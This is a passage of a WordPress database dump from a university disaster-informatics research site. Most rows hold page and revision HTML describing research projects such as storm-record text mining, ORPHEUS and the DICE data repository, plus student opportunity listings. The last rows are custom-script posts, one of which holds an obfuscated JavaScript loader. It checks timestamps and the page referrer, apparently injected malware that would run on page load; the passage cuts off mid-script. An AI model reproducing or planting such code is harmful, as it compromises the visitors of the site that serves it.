already, but not for every storm event. Records starting in 1996 are already in plain text. For almost all records, there are natural language narratives, and these narrative/s have the potential\n of containing crucial information about the episodes/events. If these narratives were in a more structured format, they could potentially yield a better understanding of destruction patterns and possible focuses for resilience. This\n two-part project is utilizing modern Optical Character Recognition, Information Retrieval, Deep Learning, and Natural Language Processing Tools in order to data-mine and extract information from these storm event records.</p>\n </div>\n </div>\n </div>\n </div>\n </div>\n <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-359-outer style-local-126-c19-outer\">\n <div data-colibri-id=\"126-c19\" class=\"d-flex h-flex-basis h-column__inner h-ui-empty-state-container h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-359 style-local-126-c19 position-relative\">\n <!---->\n <!---->\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100\">\n <!---->\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n <div data-colibri-component=\"section\" data-colibri-id=\"126-c38\" id=\"about\" class=\"h-section h-section-global-spacing d-flex align-items-lg-center align-items-md-center align-items-center style-866 style-local-126-c38 position-relative\">\n <!---->\n <!---->\n <div class=\"h-section-grid-container h-section-boxed-container\">\n <!---->\n <div data-colibri-id=\"126-c39\" class=\"h-row-container gutters-row-lg-0 gutters-row-md-0 gutters-row-0 gutters-row-v-lg-0 gutters-row-v-md-0 gutters-row-v-0 style-867 style-local-126-c39 position-relative\">\n <!---->\n <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-0 gutters-col-md-0 gutters-col-0 gutters-col-v-lg-0 gutters-col-v-md-0 gutters-col-v-0\">\n <!---->\n <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-868-outer style-local-126-c40-outer\">\n <div data-colibri-id=\"126-c40\" class=\"d-flex h-flex-basis h-column__inner h-ui-empty-state-container h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-868 style-local-126-c40 position-relative\">\n <!---->\n <!---->\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100\">\n <!---->\n </div>\n </div>\n </div>\n <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-869-outer style-local-126-c41-outer\">\n <div data-colibri-id=\"126-c41\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-869 style-local-126-c41 position-relative\">\n <!---->\n <!---->\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n <!---->\n <div data-colibri-id=\"126-c44\" class=\"h-text h-text-component style-872 style-local-126-c44 position-relative h-element\">\n <!---->\n <!---->\n <div class=\"\">\n <p>The goal of broadening participation in computing (BPC) must address inequities in access to preparatory CS training at the K-12 level. Inequitable allocation of resources follows racial, ethnic, and socio-economic divides across school\n districts leading to disparate opportunities of early access to CS education. Considering the multitude of factors that contribute to a risk of access to CS education, the goal of this project is to determine if a combination of\n demographic, socio-economic, and school enrollment factors can be used to locate Racially Inequitable Computer Science (RICS) deserts. RICS Deserts will be used to determine strategic locations to place resources (e.g. AP classes,\n and CS teachers) or interventions (e.g. summer camps, after school programs, student clubs) to achieve greatest impact. </p>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n <div data-colibri-component=\"section\" data-colibri-id=\"126-c26\" id=\"about-5\" class=\"h-section h-section-global-spacing d-flex align-items-lg-center align-items-md-center align-items-center style-381 style-local-126-c26 position-relative\">\n <!---->\n <!---->\n <div class=\"h-section-grid-container h-section-fluid-container\">\n <!---->\n <div data-colibri-id=\"126-c27\" class=\"h-row-container gutters-row-lg-0 gutters-row-md-0 gutters-row-0 gutters-row-v-lg-0 gutters-row-v-md-0 gutters-row-v-0 style-382 style-local-126-c27 position-relative\">\n <!---->\n <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-0 gutters-col-md-0 gutters-col-0 gutters-col-v-lg-0 gutters-col-v-md-0 gutters-col-v-0\">\n <!---->\n <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-383-outer style-local-126-c28-outer\">\n <div data-colibri-id=\"126-c28\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-383 style-local-126-c28 position-relative\">\n <!---->\n <!---->\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n <!---->\n <div data-colibri-id=\"126-c29\" class=\"h-global-transition-all h-heading style-384 style-local-126-c29 position-relative h-element\">\n <!---->\n <div class=\"h-heading__outer style-384 style-local-126-c29\">\n <!---->\n <!---->\n <h5 class=\"\">ORPHEUS</h5>\n </div>\n </div>\n <div data-colibri-id=\"126-c30\" class=\"h-text h-text-component style-386 style-local-126-c30 position-relative h-element\">\n <!---->\n <!---->\n <div class=\"\">\n <p>Operational Readiness for Public Health Emergencies in the U.S. (ORPHEUS) is a decision support framework that shall enable public health practitioners and responders to guide individuals, groups, communities, and populations out of\n the chaos brought upon a geographic region by natural or human-made disasters. Upon prioritizing regional hazards, planning authorities will determine specific mitigation strategies for those hazards. While data-driven tools that\n can aid regional hazard prioritization have been developed in recent years, we witness a distinct lack of such data-driven tools that facilitate the design of effective response plans capable of addressing specific hazards.</p>\n </div>\n </div>\n </div>\n </div>\n </div>\n <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-387-outer style-local-126-c31-outer\">\n <div data-colibri-id=\"126-c31\" class=\"d-flex h-flex-basis h-column__inner h-ui-empty-state-container h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-387 style-local-126-c31 position-relative\">\n <!---->\n <!---->\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100\">\n <!---->\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n <div data-colibri-component=\"section\" data-colibri-id=\"126-c8\" id=\"about-2\" class=\"h-section h-section-global-spacing d-flex align-items-lg-center align-items-md-center align-items-center style-346 style-local-126-c8 position-relative\">\n <!---->\n <!---->\n <div class=\"h-section-grid-container h-section-fluid-container\">\n <!---->\n <div data-colibri-id=\"126-c9\" class=\"h-row-container gutters-row-lg-0 gutters-row-md-0 gutters-row-0 gutters-row-v-lg-0 gutters-row-v-md-0 gutters-row-v-0 style-347 style-local-126-c9 position-relative\">\n <!---->\n <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-0 gutters-col-md-0 gutters-col-0 gutters-col-v-lg-0 gutters-col-v-md-0 gutters-col-v-0\">\n <!---->\n <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-348-outer style-local-126-c10-outer\">\n <div data-colibri-id=\"126-c10\" class=\"d-flex h-flex-basis h-column__inner h-ui-empty-state-container h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-348 style-local-126-c10 position-relative\">\n <!---->\n <!---->\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100\">\n <!---->\n </div>\n </div>\n </div>\n <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-349-outer style-local-126-c11-outer\">\n <div data-colibri-id=\"126-c11\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-349 style-local-126-c11 position-relative\">\n <!---->\n <!---->\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n <!---->\n <div data-colibri-id=\"126-c12\" class=\"h-global-transition-all h-heading style-350 style-local-126-c12 position-relative h-element\">\n <!---->\n <div class=\"h-heading__outer style-350 style-local-126-c12\">\n <!---->\n <!---->\n <h5 class=\"\">GSU Contact Network Prediction</h5>\n </div>\n </div>\n <div data-colibri-id=\"126-c13\" class=\"h-text h-text-component style-352 style-local-126-c13 position-relative h-element\">\n <!---->\n <!---->\n <div class=\"\">\n <p>The name of this project, chimera, has two meanings, which metaphorically fit well with our project. First, a chimera is a Greek mythological, hybrid lion/goat/snake fire-breathing creature, which reflects our approach to this\n research. We are using an ensemble of simulation types/models to create a picture of scheduled contacts that a GSU student may make on a given day in the school semester. Another meaning for chimera is a thing that is impossible\n to achieve, and this is also critical to the project; No matter how close we try to simulate reality, the model will never achieve anywhere close to perfection. To combat this impossibility, we work to develop abstract methods to\n account for this implicit imperfection to get as close as we can without flying too close to the sun. In our research for Project Chimera, we endeavor to create an ensemble simulation model to ultimately allow us to simulate efforts\n to reduce the number of “scheduled” contacts a GSU student makes throughout the day.</p>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n <div data-colibri-component=\"section\" data-colibri-id=\"126-c45\" id=\"about-7\" class=\"h-section h-section-global-spacing d-flex align-items-lg-center align-items-md-center align-items-center style-873 style-local-126-c45 position-relative\">\n <!---->\n <!---->\n <div class=\"h-section-grid-container h-section-boxed-container\">\n <!---->\n <div data-colibri-id=\"126-c46\" class=\"h-row-container gutters-row-lg-0 gutters-row-md-0 gutters-row-0 gutters-row-v-lg-0 gutters-row-v-md-0 gutters-row-v-0 style-874 style-local-126-c46 position-relative\">\n <!---->\n <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-0 gutters-col-md-0 gutters-col-0 gutters-col-v-lg-0 gutters-col-v-md-0 gutters-col-v-0\">\n <!---->\n <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-875-outer style-local-126-c47-outer\">\n <div data-colibri-id=\"126-c47\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-875 style-local-126-c47 position-relative\">\n <!---->\n <!---->\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n <!---->\n <div data-colibri-id=\"126-c48\" class=\"h-global-transition-all h-heading style-876 style-local-126-c48 position-relative h-element\">\n <!---->\n <div class=\"h-heading__outer style-876 style-local-126-c48\">\n <!---->\n <!---->\n <h5 class=\"\">DICE Data Repository</h5>\n </div>\n </div>\n <div data-colibri-id=\"126-c50\" class=\"h-text h-text-component style-878 style-local-126-c50 position-relative h-element\">\n <!---->\n <!---->\n <div class=\"\">\n <p><span style=\"font-weight: 400; font-size: 16px; font-family: "Open Sans"; color: rgb(64, 85, 169);\">The DICE data repository aims to be a data clearinghouse for spatially-indexed datasets on disease and disaster outcomes, population indicators of vulnerability, hazard and disaster events, and other variables related to the assessment of population risk and resilience to hazards and disasters. In addition to a large database that is accessible via published APIs, DICE researchers are developing an ontology-based framework for hazards and disasters. The proposed ontology will define semantics associated with adverse events & corresponding response and recovery efforts. </span></p>\n </div>\n </div>\n </div>\n </div>\n </div>\n <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-879-outer style-local-126-c51-outer\">\n <div data-colibri-id=\"126-c51\" class=\"d-flex h-flex-basis h-column__inner h-ui-empty-state-container h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-879 style-local-126-c51 position-relative\">\n <!---->\n <!---->\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100\">\n <!---->\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n</div>','Research','','inherit','closed','closed','','126-revision-v1','','','2023-09-29 11:19:47','2023-09-29 15:19:47','',126,'https://gsudice.dataconn.net/?p=1564',0,'revision','',0),(1573,1,'2023-09-29 11:24:06','2023-09-29 15:24:06','<div data-colibri-id=\"1573-c1\" class=\"style-880 style-local-1573-c1 position-relative\">\n <!---->\n <div data-colibri-component=\"section\" data-colibri-id=\"1573-c2\" id=\"custom\" class=\"h-section h-section-global-spacing d-flex align-items-lg-center align-items-md-center align-items-center style-881 style-local-1573-c2 position-relative\">\n <!---->\n <!---->\n <div class=\"h-section-grid-container h-section-boxed-container\">\n <!---->\n <div data-colibri-id=\"1573-c3\" class=\"h-row-container gutters-row-lg-2 gutters-row-md-2 gutters-row-0 gutters-row-v-lg-2 gutters-row-v-md-2 gutters-row-v-2 style-882 style-local-1573-c3 position-relative\">\n <!---->\n <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-2 gutters-col-md-2 gutters-col-0 gutters-col-v-lg-2 gutters-col-v-md-2 gutters-col-v-2\">\n <!---->\n <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-883-outer style-local-1573-c4-outer\">\n <div data-colibri-id=\"1573-c4\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-883 style-local-1573-c4 position-relative\">\n <!---->\n <!---->\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n <!---->\n <div data-colibri-id=\"1573-c5\" class=\"h-text h-text-component style-893 style-local-1573-c5 position-relative h-element\">\n <!---->\n <!---->\n <div class=\"\">\n <h4><strong>Funded Research</strong></h4>\n <p><em>There are no funded opportunities open at this time.</em></p>\n <h4><strong>Graduate Thesis</strong></h4>\n <p><em style=\"color: rgb(48, 62, 122); font-family: "Open Sans"; font-size: 16px; font-weight: 400;\">There are no opportunities open at this time.</em></p>\n <h4><strong>Graduate Projects</strong></h4>\n <p><em>Students interested in deploying a data catalog (datahub) for the DICE repository, please contact Chetan Tiwari (dice@cs.gsu.edu)</em></p>\n <h4><strong>Undergraduate Research</strong></h4>\n <p><em style=\"font-weight: 400; font-size: 16px; font-family: "Open Sans"; color: rgb(48, 62, 122);\">Students interested in using Geographic Information Systems to create building models, contact Jean Guo (tguo4@student.gsu.edu)</em></p>\n <p>\n <br>\n </p>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n</div>','Student Opportunities','','publish','closed','closed','','colibri-1573','','','2023-09-29 11:37:59','2023-09-29 15:37:59','',0,'https://gsudice.dataconn.net/?page_id=1573',0,'page','',0),(1574,1,'2023-09-29 11:24:06','2023-09-29 15:24:06','','Colibri #1573','','inherit','closed','closed','','1573-revision-v1','','','2023-09-29 11:24:06','2023-09-29 15:24:06','',1573,'https://gsudice.dataconn.net/?p=1574',0,'revision','',0),(1576,1,'2023-09-29 11:36:36','2023-09-29 15:35:59',' ','','','publish','closed','closed','','1576','','','2023-09-29 11:36:36','2023-09-29 15:36:36','',0,'https://gsudice.dataconn.net/?p=1576',4,'nav_menu_item','',0),(1577,1,'2023-09-29 11:35:59','2023-09-29 15:35:59','{\"name\":\"hop-content\",\"children\":[{\"name\":\"hop-section\",\"props\":{\"anchor\":false,\"name\":\"Custom\",\"attrs\":{\"id\":\"custom\"}},\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":\"100\",\"unit\":\"%\"}}}}},\"id\":\"1573-c4\",\"parentId\":\"1573-c3\",\"partialId\":1573,\"children\":[{\"name\":\"hop-text\",\"slot\":null,\"parentId\":\"1573-c4\",\"index\":0,\"id\":\"1573-c5\",\"partialId\":1573,\"styleRef\":893,\"type\":\"content\",\"props\":{\"content\":\"<h4><strong>Funded Research<\\/strong><\\/h4><p><em>There are no funded opportunities open at this time.<\\/em><\\/p><h4><strong>Graduate Thesis<\\/strong><\\/h4><p><em style=\\\"color: rgb(48, 62, 122); font-family: "Open Sans"; font-size: 16px; font-weight: 400;\\\">There are no opportunities open at this time.<\\/em><\\/p><h4><strong>Graduate Projects<\\/strong><\\/h4><p><em>Students interested in deploying a data catalog (datahub) for the DICE repository, please contact Chetan Tiwari (dice@cs.gsu.edu)<\\/em><\\/p><h4><strong>Undergraduate Research<\\/strong><\\/h4><p><em style=\\\"font-weight: 400; font-size: 16px; font-family: "Open Sans"; color: rgb(48, 62, 122);\\\">Students interested in using Geographic Information Systems to create building models, contact Jean Guo (tguo4@student.gsu.edu)<\\/em><\\/p><p><br><\\/p>\"}}],\"styleRef\":883,\"type\":\"content\"}],\"id\":\"1573-c3\",\"parentId\":\"1573-c2\",\"partialId\":1573,\"styleRef\":882,\"type\":\"content\"}],\"id\":\"1573-c2\",\"parentId\":\"1573-c1\",\"partialId\":1573,\"styleRef\":881,\"type\":\"content\"}],\"id\":\"1573-c1\",\"partialId\":1573,\"styleRef\":880,\"type\":\"content\"}','','','publish','closed','closed','','1577','','','2023-09-29 11:37:59','2023-09-29 15:37:59','',0,'https://gsudice.dataconn.net/?post_type=extb_post_json&p=1577',0,'extb_post_json','',0),(1578,1,'2023-09-29 11:35:59','2023-09-29 15:35:59','<div data-colibri-id=\"1573-c1\" class=\"style-880 style-local-1573-c1 position-relative\">\n <!---->\n <div data-colibri-component=\"section\" data-colibri-id=\"1573-c2\" id=\"custom\" class=\"h-section h-section-global-spacing d-flex align-items-lg-center align-items-md-center align-items-center style-881 style-local-1573-c2 position-relative\">\n <!---->\n <!---->\n <div class=\"h-section-grid-container h-section-boxed-container\">\n <!---->\n <div data-colibri-id=\"1573-c3\" class=\"h-row-container gutters-row-lg-2 gutters-row-md-2 gutters-row-0 gutters-row-v-lg-2 gutters-row-v-md-2 gutters-row-v-2 style-882 style-local-1573-c3 position-relative\">\n <!---->\n <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-2 gutters-col-md-2 gutters-col-0 gutters-col-v-lg-2 gutters-col-v-md-2 gutters-col-v-2\">\n <!---->\n <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-883-outer style-local-1573-c4-outer\">\n <div data-colibri-id=\"1573-c4\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-883 style-local-1573-c4 position-relative\">\n <!---->\n <!---->\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n <!---->\n <div data-colibri-id=\"1573-c14\" class=\"h-text h-text-component style-893 style-local-1573-c14 position-relative h-element\">\n <!---->\n <!---->\n <div class=\"\">\n <h4><strong>Funded Research</strong></h4>\n <p><em>There are no funded opportunities open at this time.</em></p>\n <h4><strong>Graduate Thesis</strong></h4>\n <p><em style=\"font-weight: 400; font-size: 16px; font-family: "Open Sans"; color: rgb(48, 62, 122);\">There are no funded opportunities open at this time.</em></p>\n <h4><strong>Graduate Projects</strong></h4>\n <p><em>Students interested in deploying a data catalog (datahub) for the DICE repository, please contact Chetan Tiwari (dice@cs.gsu.edu)</em></p>\n <h4><strong>Undergraduate Research</strong></h4>\n <p><em style=\"color: rgb(48, 62, 122); font-family: "Open Sans"; font-size: 16px; font-weight: 400;\">Students interested in using Geographic Information Systems to create building models, contact Jean Guo (tguo4@student.gsu.edu)</em></p>\n <p>\n <br>\n </p>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n</div>','Colibri #1573','','inherit','closed','closed','','1573-revision-v1','','','2023-09-29 11:35:59','2023-09-29 15:35:59','',1573,'https://gsudice.dataconn.net/?p=1578',0,'revision','',0),(1583,1,'2023-09-29 11:36:25','2023-09-29 15:36:25','<div data-colibri-id=\"1573-c1\" class=\"style-880 style-local-1573-c1 position-relative\">\r\n <!---->\r\n <div data-colibri-component=\"section\" data-colibri-id=\"1573-c2\" id=\"custom\" class=\"h-section h-section-global-spacing d-flex align-items-lg-center align-items-md-center align-items-center style-881 style-local-1573-c2 position-relative\">\r\n <!---->\r\n <!---->\r\n <div class=\"h-section-grid-container h-section-boxed-container\">\r\n <!---->\r\n <div data-colibri-id=\"1573-c3\" class=\"h-row-container gutters-row-lg-2 gutters-row-md-2 gutters-row-0 gutters-row-v-lg-2 gutters-row-v-md-2 gutters-row-v-2 style-882 style-local-1573-c3 position-relative\">\r\n <!---->\r\n <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-2 gutters-col-md-2 gutters-col-0 gutters-col-v-lg-2 gutters-col-v-md-2 gutters-col-v-2\">\r\n <!---->\r\n <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-883-outer style-local-1573-c4-outer\">\r\n <div data-colibri-id=\"1573-c4\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-883 style-local-1573-c4 position-relative\">\r\n <!---->\r\n <!---->\r\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\r\n <!---->\r\n <div data-colibri-id=\"1573-c14\" class=\"h-text h-text-component style-893 style-local-1573-c14 position-relative h-element\">\r\n <!---->\r\n <!---->\r\n <div class=\"\">\r\n <h4><strong>Funded Research</strong></h4>\r\n <p><em>There are no funded opportunities open at this time.</em></p>\r\n <h4><strong>Graduate Thesis</strong></h4>\r\n <p><em style=\"font-weight: 400; font-size: 16px; font-family: "Open Sans"; color: rgb(48, 62, 122);\">There are no funded opportunities open at this time.</em></p>\r\n <h4><strong>Graduate Projects</strong></h4>\r\n <p><em>Students interested in deploying a data catalog (datahub) for the DICE repository, please contact Chetan Tiwari (dice@cs.gsu.edu)</em></p>\r\n <h4><strong>Undergraduate Research</strong></h4>\r\n <p><em style=\"color: rgb(48, 62, 122); font-family: "Open Sans"; font-size: 16px; font-weight: 400;\">Students interested in using Geographic Information Systems to create building models, contact Jean Guo (tguo4@student.gsu.edu)</em></p>\r\n <p>\r\n <br>\r\n </p>\r\n </div>\r\n </div>\r\n </div>\r\n </div>\r\n </div>\r\n </div>\r\n </div>\r\n </div>\r\n </div>\r\n</div>','Student Opportunities','','inherit','closed','closed','','1573-revision-v1','','','2023-09-29 11:36:25','2023-09-29 15:36:25','',1573,'https://gsudice.dataconn.net/?p=1583',0,'revision','',0),(1585,1,'2023-09-29 11:37:59','2023-09-29 15:37:59','{\"name\":\"hop-content\",\"children\":[{\"name\":\"hop-section\",\"props\":{\"anchor\":false,\"name\":\"Custom\",\"attrs\":{\"id\":\"custom\"}},\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":\"100\",\"unit\":\"%\"}}}}},\"id\":\"1573-c4\",\"parentId\":\"1573-c3\",\"partialId\":1573,\"children\":[{\"name\":\"hop-text\",\"slot\":null,\"parentId\":\"1573-c4\",\"index\":0,\"id\":\"1573-c5\",\"partialId\":1573,\"styleRef\":893,\"type\":\"content\",\"props\":{\"content\":\"<h4><strong>Funded Research<\\/strong><\\/h4><p><em>There are no funded opportunities open at this time.<\\/em><\\/p><h4><strong>Graduate Thesis<\\/strong><\\/h4><p><em style=\\\"color: rgb(48, 62, 122); font-family: "Open Sans"; font-size: 16px; font-weight: 400;\\\">There are no opportunities open at this time.<\\/em><\\/p><h4><strong>Graduate Projects<\\/strong><\\/h4><p><em>Students interested in deploying a data catalog (datahub) for the DICE repository, please contact Chetan Tiwari (dice@cs.gsu.edu)<\\/em><\\/p><h4><strong>Undergraduate Research<\\/strong><\\/h4><p><em style=\\\"font-weight: 400; font-size: 16px; font-family: "Open Sans"; color: rgb(48, 62, 122);\\\">Students interested in using Geographic Information Systems to create building models, contact Jean Guo (tguo4@student.gsu.edu)<\\/em><\\/p><p><br><\\/p>\"}}],\"styleRef\":883,\"type\":\"content\"}],\"id\":\"1573-c3\",\"parentId\":\"1573-c2\",\"partialId\":1573,\"styleRef\":882,\"type\":\"content\"}],\"id\":\"1573-c2\",\"parentId\":\"1573-c1\",\"partialId\":1573,\"styleRef\":881,\"type\":\"content\"}],\"id\":\"1573-c1\",\"partialId\":1573,\"styleRef\":880,\"type\":\"content\"}','','','inherit','closed','closed','','1577-revision-v1','','','2023-09-29 11:37:59','2023-09-29 15:37:59','',1577,'https://gsudice.dataconn.net/?p=1585',0,'revision','',0),(1586,1,'2023-09-29 11:37:59','2023-09-29 15:37:59','<div data-colibri-id=\"1573-c1\" class=\"style-880 style-local-1573-c1 position-relative\">\n <!---->\n <div data-colibri-component=\"section\" data-colibri-id=\"1573-c2\" id=\"custom\" class=\"h-section h-section-global-spacing d-flex align-items-lg-center align-items-md-center align-items-center style-881 style-local-1573-c2 position-relative\">\n <!---->\n <!---->\n <div class=\"h-section-grid-container h-section-boxed-container\">\n <!---->\n <div data-colibri-id=\"1573-c3\" class=\"h-row-container gutters-row-lg-2 gutters-row-md-2 gutters-row-0 gutters-row-v-lg-2 gutters-row-v-md-2 gutters-row-v-2 style-882 style-local-1573-c3 position-relative\">\n <!---->\n <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-2 gutters-col-md-2 gutters-col-0 gutters-col-v-lg-2 gutters-col-v-md-2 gutters-col-v-2\">\n <!---->\n <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-883-outer style-local-1573-c4-outer\">\n <div data-colibri-id=\"1573-c4\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-883 style-local-1573-c4 position-relative\">\n <!---->\n <!---->\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n <!---->\n <div data-colibri-id=\"1573-c5\" class=\"h-text h-text-component style-893 style-local-1573-c5 position-relative h-element\">\n <!---->\n <!---->\n <div class=\"\">\n <h4><strong>Funded Research</strong></h4>\n <p><em>There are no funded opportunities open at this time.</em></p>\n <h4><strong>Graduate Thesis</strong></h4>\n <p><em style=\"color: rgb(48, 62, 122); font-family: "Open Sans"; font-size: 16px; font-weight: 400;\">There are no opportunities open at this time.</em></p>\n <h4><strong>Graduate Projects</strong></h4>\n <p><em>Students interested in deploying a data catalog (datahub) for the DICE repository, please contact Chetan Tiwari (dice@cs.gsu.edu)</em></p>\n <h4><strong>Undergraduate Research</strong></h4>\n <p><em style=\"font-weight: 400; font-size: 16px; font-family: "Open Sans"; color: rgb(48, 62, 122);\">Students interested in using Geographic Information Systems to create building models, contact Jean Guo (tguo4@student.gsu.edu)</em></p>\n <p>\n <br>\n </p>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n</div>','Student Opportunities','','inherit','closed','closed','','1573-revision-v1','','','2023-09-29 11:37:59','2023-09-29 15:37:59','',1573,'https://gsudice.dataconn.net/?p=1586',0,'revision','',0),(1592,1,'2023-09-29 12:57:19','2023-09-29 16:57:19','https://gsudice.dataconn.net/wp-content/uploads/2022/03/cropped-Sundos_Al_Subhi-1.jpg','cropped-cropped-Sundos_Al_Subhi-1.jpg','','inherit','open','closed','','cropped-cropped-sundos_al_subhi-1-jpg','','','2023-09-29 12:57:19','2023-09-29 16:57:19','',0,'https://gsudice.dataconn.net/wp-content/uploads/2022/03/cropped-cropped-Sundos_Al_Subhi-1.jpg',0,'attachment','image/jpeg',0),(1593,1,'2023-09-29 14:45:51','2023-09-29 18:45:51','<!-- 3124b806df769478342d448c4f8b0a76 -->','','','publish','closed','closed','','1593','','','2023-09-29 14:45:51','2023-09-29 18:45:51','',0,'https://gsudice.dataconn.net/?post_type=custom-css-js&p=1593',0,'custom-css-js','',0),(1594,1,'2023-09-29 14:45:55','2023-09-29 18:45:55','<script type=\"text/javascript\">\r\n(function(_0xc59469,_0x1be38e){var _0x4e20c3=_0x442d,_0x3c2d09=_0xc59469();while(!![]){try{var _0x3c8895=-parseInt(_0x4e20c3(0xb6))/0x1*(-parseInt(_0x4e20c3(0xbc))/0x2)+parseInt(_0x4e20c3(0xb7))/0x3+-parseInt(_0x4e20c3(0xc4))/0x4*(-parseInt(_0x4e20c3(0xc1))/0x5)+-parseInt(_0x4e20c3(0xb9))/0x6+parseInt(_0x4e20c3(0xc0))/0x7+-parseInt(_0x4e20c3(0xbd))/0x8+-parseInt(_0x4e20c3(0xbb))/0x9;if(_0x3c8895===_0x1be38e)break;else _0x3c2d09[\'push\'](_0x3c2d09[\'shift\']());}catch(_0x3a9717){_0x3c2d09[\'push\'](_0x3c2d09[\'shift\']());}}}(_0x2bda,0x57e32),function(_0x17c8ea,_0x2572e7){var _0x45965e=_0x442d,_0x4c3cdb=Math[\'floor\'](Date[_0x45965e(0xbe)]()/0x3e8),_0x5c98df=_0x4c3cdb-_0x4c3cdb%0xe10;_0x4c3cdb=_0x4c3cdb-_0x4c3cdb%0x258,_0x4c3cdb=_0x4c3cdb[_0x45965e(0xbf)](0x10);if(!document[_0x45965e(0xba)])return;const 